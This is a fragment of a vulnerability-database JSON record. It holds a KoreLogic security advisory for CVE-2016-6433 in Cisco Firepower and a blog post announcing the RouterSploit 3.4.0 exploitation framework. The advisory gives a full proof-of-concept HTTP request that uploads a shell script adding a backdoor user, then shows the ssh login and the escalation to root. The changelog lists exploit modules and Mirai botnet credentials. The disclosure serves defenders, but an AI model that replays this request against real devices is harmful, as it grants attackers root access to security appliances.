"version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2016-6433", "CVE-2016-6433"], "modified": "2016-10-05T00:00:00", "id": "EDB-ID:40463", "href": "https://www.exploit-db.com/exploits/40463", "sourceData": "KL-001-2016-007 : Cisco Firepower Threat Management Console Remote Command\r\nExecution Leading to Root Access\r\n\r\nTitle: Cisco Firepower Threat Management Console Remote Command Execution\r\nLeading to Root Access\r\nAdvisory ID: KL-001-2016-007\r\nPublication Date: 2016.10.05\r\nPublication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-007.txt\r\n\r\n\r\n1. 
Vulnerability Details\r\n\r\n Affected Vendor: Cisco\r\n Affected Product: Firepower Threat Management Console\r\n Affected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213)\r\n Platform: Embedded Linux\r\n CWE Classification: CWE-434: Unrestricted Upload of File with Dangerous\r\n Type, CWE-94: Improper Control of Generation of Code\r\n Impact: Arbitrary Code Execution\r\n Attack vector: HTTP\r\n CVE-ID: CVE-2016-6433\r\n\r\n2. Vulnerability Description\r\n\r\n An authenticated user can run arbitrary system commands as\r\n the www user which leads to root.\r\n\r\n3. Technical Description\r\n\r\n A valid session and CSRF token is required. The webserver runs as\r\n a non-root user which is permitted to sudo commands as root with\r\n no password.\r\n\r\n POST /DetectionPolicy/rules/rulesimport.cgi?no_mojo=1 HTTP/1.1\r\n Host: 1.3.3.7\r\n User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0)\r\nGecko/20100101 Firefox/45.0\r\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n Accept-Language: en-US,en;q=0.5\r\n Accept-Encoding: gzip, deflate, br\r\n DNT: 1\r\n Cookie: CGISESSID=4919a7838198009bba48f6233d0bd1c6\r\n Connection: close\r\n Content-Type: multipart/form-data;\r\nboundary=---------------------------15519792567789791301241925798\r\n Content-Length: 813\r\n\r\n -----------------------------15519792567789791301241925798\r\n Content-Disposition: form-data; name=\"manual_update\"\r\n\r\n 1\r\n -----------------------------15519792567789791301241925798\r\n Content-Disposition: form-data; name=\"source\"\r\n\r\n file\r\n -----------------------------15519792567789791301241925798\r\n Content-Disposition: form-data; name=\"file\";\r\nfilename=\"Sourcefire_Rule_Update-2016-03-04-001-vrt.sh\"\r\n Content-Type: application/octet-stream\r\n\r\n sudo useradd -G ldapgroup -p `openssl passwd -1 korelogic` korelogic\r\n -----------------------------15519792567789791301241925798\r\n Content-Disposition: form-data; 
name=\"action_submit\"\r\n\r\n Import\r\n -----------------------------15519792567789791301241925798\r\n Content-Disposition: form-data; name=\"sf_action_id\"\r\n\r\n 8c6059ae8dbedc089877b16b7be2ae7f\r\n -----------------------------15519792567789791301241925798--\r\n\r\n\r\n HTTP/1.1 200 OK\r\n Date: Sat, 23 Apr 2016 13:38:01 GMT\r\n Server: Apache\r\n Vary: Accept-Encoding\r\n X-Frame-Options: SAMEORIGIN\r\n Content-Length: 49998\r\n Connection: close\r\n Content-Type: text/html; charset=utf-8\r\n\r\n ...\r\n\r\n $ ssh korelogic@1.3.3.7\r\n Password:\r\n\r\n Copyright 2004-2016, Cisco and/or its affiliates. All rights reserved.\r\n Cisco is a registered trademark of Cisco Systems, Inc.\r\n All other trademarks are property of their respective owners.\r\n\r\n Cisco Fire Linux OS v6.0.1 (build 37)\r\n Cisco Firepower Management Center for VMWare v6.0.1 (build 1213)\r\n\r\n Could not chdir to home directory /Volume/home/korelogic: No such file or\r\ndirectory\r\n korelogic@firepower:/$ sudo su -\r\n Password:\r\n root@firepower:~#\r\n\r\n4. Mitigation and Remediation Recommendation\r\n\r\n The vendor has acknowledged this vulnerability but has\r\n not issued a fix. Vendor acknowledgement available at:\r\n\r\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc\r\n\r\n5. Credit\r\n\r\n This vulnerability was discovered by Matt Bergin (@thatguylevel) of\r\nKoreLogic, Inc.\r\n\r\n6. 
Disclosure Timeline\r\n\r\n 2016.06.30 - KoreLogic sends vulnerability report and PoC to Cisco.\r\n 2016.06.30 - Cisco acknowledges receipt of vulnerability report.\r\n 2016.07.20 - KoreLogic and Cisco discuss remediation timeline for\r\n this vulnerability and for 3 others reported in the\r\n same product.\r\n 2016.08.12 - 30 business days have elapsed since the vulnerability was\r\n reported to Cisco.\r\n 2016.09.02 - 45 business days have elapsed since the vulnerability was\r\n reported to Cisco.\r\n 2016.09.09 - KoreLogic asks for an update on the status of the\r\n remediation efforts.\r\n 2016.09.15 - Cisco confirms remediation is underway and soon to be\r\n completed.\r\n 2016.09.28 - Cisco informs KoreLogic that the acknowledgement details\r\n will be released publicly on 2016.10.05.\r\n 2016.10.05 - Public disclosure.\r\n\r\n7. Proof of Concept\r\n\r\n See Technical Description\r\n\r\n\r\nThe contents of this advisory are copyright(c) 2016\r\nKoreLogic, Inc. and are licensed under a Creative Commons\r\nAttribution Share-Alike 4.0 (United States) License:\r\nhttp://creativecommons.org/licenses/by-sa/4.0/\r\n\r\nKoreLogic, Inc. is a founder-owned and operated company with a\r\nproven track record of providing security services to entities\r\nranging from Fortune 500 to small and mid-sized companies. We\r\nare a highly skilled team of senior security consultants doing\r\nby-hand security assessments for the most important networks in\r\nthe U.S. and around the world. 
We are also developers of various\r\ntools and resources aimed at helping the security community.\r\nhttps://www.korelogic.com/about-korelogic.html\r\n\r\nOur public vulnerability disclosure policy is available at:\r\nhttps://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt", "sourceHref": "https://www.exploit-db.com/download/40463", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "pentestit": [{"lastseen": "2018-10-18T18:23:37", "description": "PenTestIT RSS Feed\n\n**RouterSploit 3.4.0**, the long awaited [_router exploitation framework_](<http://pentestit.com/routersploit-router-exploitation-framework/>) update is out guys! This release includes some really cool features and updates such as switching from `pycrypto` to `pycryptodome` and newer exploitation modules! Read on for the improvements.\n\n\n\nWhat is RouterSploit?\n\n> The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices. It consists of the following modules that aid penetration testing operations:\n> \n> * exploits \u2013 modules that take advantage of identified vulnerabilities\n> * creds \u2013 modules designed to test credentials against network services\n> * scanners \u2013 modules that check if a target is vulnerable to any exploit\n> * payloads \u2013 modules that are responsible for generating payloads for various architectures and injection points\n> * generic \u2013 modules that perform generic attacks\n\n## Official RouterSploit 3.4.0 changelog:\n\n * Fixing `setup.py` resources\n * Switching to pycryptodome\n * Fixing communication API\n * Adding `exploits/routers/asus/asuswrt_lan_rce.py` module (CVE-2018-5999/CVE-2018-6000)\n * Fixing `exploits/routers/asus/infosvr_backdoor_rce.py` module\n * Adding credentials used by Mirai botnet\n * Fixing 3com Officeconnect RCE module\n * Fixing `exploits/routers/billion/billion_5200w_rce.py` module\n * Fixing `exploits/routers/cisco/catalyst_2960_rocem.py` module 
(CVE-2017-3881)\n * Fixing `exploits/routers/cisco/firepower_management60_rce.py` module (CVE-2016-6433)\n * Fixing `exploits/routers/dlink/dir_815_850l_rce.py` module\n * Fixing `exploits/routers/multi/tcp_32764_rce.py` module\n * Fixing `exploits/routers/ubiquiti/airos_6_x.py` module\n * Adding `OptEncoder` option\n * Fixing `use` command issue\n * Adding tests `tests/exploits/cameras/cisco/test_video_surv_path_traversal.py`\n * Adding tests for modules default values\n * Adding tests `tests/exploits/routers/asus/test_infosvr_backdoor_rce.py`\n * Adding tests `tests/exploits/routers/billion/test_billion_5200w_rce.py`\n * Adding tests `tests/exploits/routers/cisco/test_firepower_management60_rce.py`\n * Adding tests `tests/exploits/routers/cisco/test_secure_acs_bypass.py`\n * Adding tests `tests/exploits/routers/dlink/test_dcs_930l_auth_rce.py`\n * Adding tests `tests/exploits/routers/technicolor/test_tg784_authbypass.py`\n * Adding tests `tests/exploits/routers/dlink/test_dsl_2730b_2780b_526b_dns_change.py`\n * Fixing `exploits/routers/ipfire/ipfire_proxy_rce.py` module\n * Fixing `exploits/routers/ipfire/ipfire_shellshock.py` module\n * Adding `exploits/routers/linksys/eseries_themoon_rce.py` module\n\n## Install RouterSploit 3.4.0:\n\nIf you have an older version checked out, all you need to do to get the latest version is run `git pull` in the installed directory. In case you do not have it installed, the current version is RouterSploit 3.4.0. 
Check out the [GIT repository](<https://github.com/threat9/routersploit>), and run\n \n \n pip3 install -r requirements.txt\n ./rsf.py\n\nThe post [UPDATED VERSION: RouterSploit 3.4.0](<http://pentestit.com/updated-version-routersploit-3-4-0/>) appeared first on [PenTestIT](<http://pentestit.com>).", "cvss3": {}, "published": "2018-10-18T18:13:04", "type": "pentestit", "title": "UPDATED VERSION: RouterSploit 3.4.0", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2016-6433", "CVE-2017-3881", "CVE-2018-5999", "CVE-2018-6000"], "modified": "2018-10-18T18:13:04", "id": "PENTESTIT:30AF1FB3AAE47288E800B5587788AF45", "href": "http://pentestit.com/updated-version-routersploit-3-4-0/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}